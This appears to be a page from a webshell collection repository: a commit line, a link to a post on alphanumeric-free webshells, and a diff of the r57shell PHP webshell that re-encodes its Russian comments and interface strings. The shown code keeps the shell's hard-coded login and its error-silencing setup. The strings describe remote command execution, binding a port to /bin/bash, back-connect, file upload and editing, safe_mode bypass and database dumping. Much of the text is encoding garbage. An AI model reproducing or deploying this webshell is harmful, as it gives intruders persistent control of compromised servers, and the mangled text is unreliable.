Create php_niu_3.php

from : https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
![img](https://www.leavesongs.com/media/attachment/2017/02/17/d92e3d40-a451-4fc4-a516-e0747b721c69.2b122097850e.jpg)

138shell/R/r57 Shell.php.txt

@@ -22,15 +22,15 @@
 /*
 /*
 /*
-/*  r57shell.php - <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>  <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-/*  <EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>: http://rst.void.ru
-/*  <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: 1.22
+/*  r57shell.php - ñêðèïò íà ïõï ïîçâîëÿþùèé âàì âûïîëíÿòü øåëë êîìàíäû  íà ñåðâåðå ÷åðåç áðàóçåð
+/*  Âû ìîæåòå ñêà÷àòü íîâóþ âåðñèþ íà íàøåì ñàéòå: http://rst.void.ru
+/*  Âåðñèÿ: 1.22
 /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
 /*  (c)oded by 1dt.w0lf
 /*  RST/GHC http://rst.void.ru , http://ghc.ru
 /******************************************************************************************************/
 
-/* ~~~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>  ~~~ */
+/* ~~~ Íàñòðîéêè  ~~~ */
 error_reporting(0);
 set_magic_quotes_runtime(0);
 @set_time_limit(0);
@@ -56,12 +56,12 @@ if (@get_magic_quotes_gpc())
   }
  }
 
-/* ~~~ <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ~~~ */
+/* ~~~ Àóòåíòèôèêàöèÿ ~~~ */
 
-// <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-// <EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!!!
-$name="r57"; // <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-$pass="r57"; // <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+// Ëîãèí è ïàðîëü äëÿ äîñòóïà ê ñêðèïòó
+// ÍÅ ÇÀÁÓÄÜÒÅ ÑÌÅÍÈÒÜ ÏÅÐÅÄ ÐÀÇÌÅÙÅÍÈÅÌ ÍÀ ÑÅÐÂÅÐÅ!!!
+$name="r57"; // ëîãèí ïîëüçîâàòåëÿ
+$pass="r57"; // ïàðîëü ïîëüçîâàòåëÿ
 
 if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_SERVER['PHP_AUTH_PW']!=$pass)
    {
@@ -69,7 +69,7 @@ if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!=$name || $_S
    header("HTTP/1.0 401 Unauthorized");
    exit("<b><a href=http://rst.void.ru>r57shell</a> : Access Denied</b>");
    }
-$head = '<!-- <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>  <20><><EFBFBD><EFBFBD> -->
+$head = '<!-- Çäðàâñòâóé  Âàñÿ -->
 <html>
 <head>
 <title>r57shell</title>
@@ -250,101 +250,101 @@ if(isset($_GET['mem']))
  }
 
 /*
-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
-$language='ru' - <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
-$language='eng' - <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+Âûáîð ÿçûêà
+$language='ru' - ðóññêèé
+$language='eng' - àíãëèéñêèé
 */
 $language='ru';
 
 $lang=array(
-'ru_text1' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text2' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text3' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text4' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text5' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text6' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>',
-'ru_text7' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text8' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>',
-'ru_butt1' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_butt2' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text9' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20> /bin/bash',
-'ru_text10'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>',
-'ru_text11'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_butt3' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
+'ru_text1' =>'Âûïîëíåííàÿ êîìàíäà',
+'ru_text2' =>'Âûïîëíåíèå êîìàíä íà ñåðâåðå',
+'ru_text3' =>'Âûïîëíèòü êîìàíäó',
+'ru_text4' =>'Ðàáî÷àÿ äèðåêòîðèÿ',
+'ru_text5' =>'Çàãðóçêà ôàéëîâ íà ñåðâåð',
+'ru_text6' =>'Ëîêàëüíûé ôàéë',
+'ru_text7' =>'Àëèàñû',
+'ru_text8' =>'Âûáåðèòå àëèàñ',
+'ru_butt1' =>'Âûïîëíèòü',
+'ru_butt2' =>'Çàãðóçèòü',
+'ru_text9' =>'Îòêðûòèå ïîðòà è ïðèâÿçêà åãî ê /bin/bash',
+'ru_text10'=>'Îòêðûòü ïîðò',
+'ru_text11'=>'Ïàðîëü äëÿ äîñòóïà',
+'ru_butt3' =>'Îòêðûòü',
 'ru_text12'=>'back-connect',
-'ru_text13'=>'IP-<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text14'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_butt4' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text15'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text16'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text17'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>',
-'ru_text18'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>',
+'ru_text13'=>'IP-àäðåñ',
+'ru_text14'=>'Ïîðò',
+'ru_butt4' =>'Âûïîëíèòü',
+'ru_text15'=>'Çàãðóçêà ôàéëîâ ñ óäàëåííîãî ñåðâåðà',
+'ru_text16'=>'Èñïîëüçîâàòü',
+'ru_text17'=>'Óäàëåííûé ôàéë',
+'ru_text18'=>'Ëîêàëüíûé ôàéë',
 'ru_text19'=>'Exploits',
-'ru_text20'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text21'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>',
+'ru_text20'=>'Èñïîëüçîâàòü',
+'ru_text21'=>'Íîâîå èìÿ',
 'ru_text22'=>'datapipe',
-'ru_text23'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>',
-'ru_text24'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>',
-'ru_text25'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>',
-'ru_text26'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_butt5' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text28'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> safe_mode',
-'ru_text29'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_butt6' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text30'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>',
-'ru_butt7' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text31'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text32'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PHP <EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text33'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> open_basedir <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> cURL',
-'ru_butt8' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text34'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> safe_mode <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> include',
-'ru_text35'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> safe_mode <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> mysql',
-'ru_text36'=>'&nbsp;&nbsp;&nbsp;&nbsp;<EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text37'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text38'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&nbsp;&nbsp;',
-'ru_text39'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text40'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> mysql <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_butt9' =>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text41'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text42'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text43'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>',
-'ru_butt10'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_butt11'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text44'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!',
-'ru_text45'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text46'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> phpinfo()',
-'ru_text47'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> php.ini',
-'ru_text48'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text49'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text50'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text51'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text52'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text53'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text54'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_butt12'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text55'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text56'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text57'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text58'=>'<EFBFBD><EFBFBD><EFBFBD>',
-'ru_text59'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text60'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_butt13'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>/<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text61'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text62'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text63'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text64'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text65'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text66'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
+'ru_text23'=>'Ëîêàëüíûé ïîðò',
+'ru_text24'=>'Óäàëåííûé õîñò',
+'ru_text25'=>'Óäàëåííûé ïîðò',
+'ru_text26'=>'Èñïîëüçîâàòü',
+'ru_butt5' =>'Çàïóñòèòü',
+'ru_text28'=>'Ðàáîòà â safe_mode',
+'ru_text29'=>'Äîñòóï çàïðåùåí',
+'ru_butt6' =>'Ñìåíèòü',
+'ru_text30'=>'Ïðîñìîòð ôàéëà',
+'ru_butt7' =>'Âûâåñòè',
+'ru_text31'=>'Ôàéë íå íàéäåí',
+'ru_text32'=>'Âûïîëíåíèå PHP êîäà',
+'ru_text33'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé open_basedir ÷åðåç ôóíêöèè cURL',
+'ru_butt8' =>'Ïðîâåðèòü',
+'ru_text34'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç ôóíêöèþ include',
+'ru_text35'=>'Ïðîâåðêà âîçìîæíîñòè îáõîäà îãðàíè÷åíèé safe_mode ÷åðåç çàãðóçêó ôàéëà â mysql',
+'ru_text36'=>'&nbsp;&nbsp;&nbsp;&nbsp;Áàçà',
+'ru_text37'=>'Ëîãèí',
+'ru_text38'=>'Ïàðîëü&nbsp;&nbsp;',
+'ru_text39'=>'Òàáëèöà',
+'ru_text40'=>'Äàìï òàáëèöû mysql ñåðâåðà',
+'ru_butt9' =>'Äàìï',
+'ru_text41'=>'Ñîõðàíèòü äàìï â ôàéëå',
+'ru_text42'=>'Ðåäàêòèðîâàíèå ôàéëà',
+'ru_text43'=>'Ðåäàêòèðîâàòü ôàéë',
+'ru_butt10'=>'Ñîõðàíèòü',
+'ru_butt11'=>'Ðåäàêòèðîâàòü',
+'ru_text44'=>'Ðåäàêòèðîâàíèå ôàéëà íåâîçìîæíî! Äîñòóï òîëüêî äëÿ ÷òåíèÿ!',
+'ru_text45'=>'Ôàéë ñîõðàíåí',
+'ru_text46'=>'Ïðîñìîòð phpinfo()',
+'ru_text47'=>'Ïðîñìîòð íàñòðîåê php.ini',
+'ru_text48'=>'Óäàëåíèå âðåìåííûõ ôàéëîâ',
+'ru_text49'=>'Óäàëåíèå ñêðèïòà ñ ñåðâåðà',
+'ru_text50'=>'Èíôîðìàöèÿ î ïðîöåññîðå',
+'ru_text51'=>'Èíôîðìàöèÿ î ïàìÿòè',
+'ru_text52'=>'Òåêñò äëÿ ïîèñêà',
+'ru_text53'=>'Èñêàòü â ïàïêå',
+'ru_text54'=>'Ïîèñê òåêñòà â ôàéëàõ',
+'ru_butt12'=>'Íàéòè',
+'ru_text55'=>'Òîëüêî â ôàéëàõ',
+'ru_text56'=>'Íè÷åãî íå íàéäåíî',
+'ru_text57'=>'Ñîçäàòü/Óäàëèòü Ôàéë/Äèðåêòîðèþ',
+'ru_text58'=>'Èìÿ',
+'ru_text59'=>'Ôàéë',
+'ru_text60'=>'Äèðåêòîðèþ',
+'ru_butt13'=>'Ñîçäàòü/Óäàëèòü',
+'ru_text61'=>'Ôàéë ñîçäàí',
+'ru_text62'=>'Äèðåêòîðèÿ ñîçäàíà',
+'ru_text63'=>'Ôàéë óäàëåí',
+'ru_text64'=>'Äèðåêòîðèÿ óäàëåíà',
+'ru_text65'=>'Ñîçäàòü',
+'ru_text66'=>'Óäàëèòü',
 'ru_text67'=>'Chown/Chgrp/Chmod',
-'ru_text68'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text69'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>1',
-'ru_text70'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>2',
-'ru_text71'=>"<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:\r\n- <EFBFBD><EFBFBD><EFBFBD> CHOWN - <EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> UID (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) \r\n- <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> CHGRP - <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> GID (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>) \r\n- <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> CHMOD - <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 0777)",
-'ru_text72'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text73'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD>',
-'ru_text74'=>'<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>',
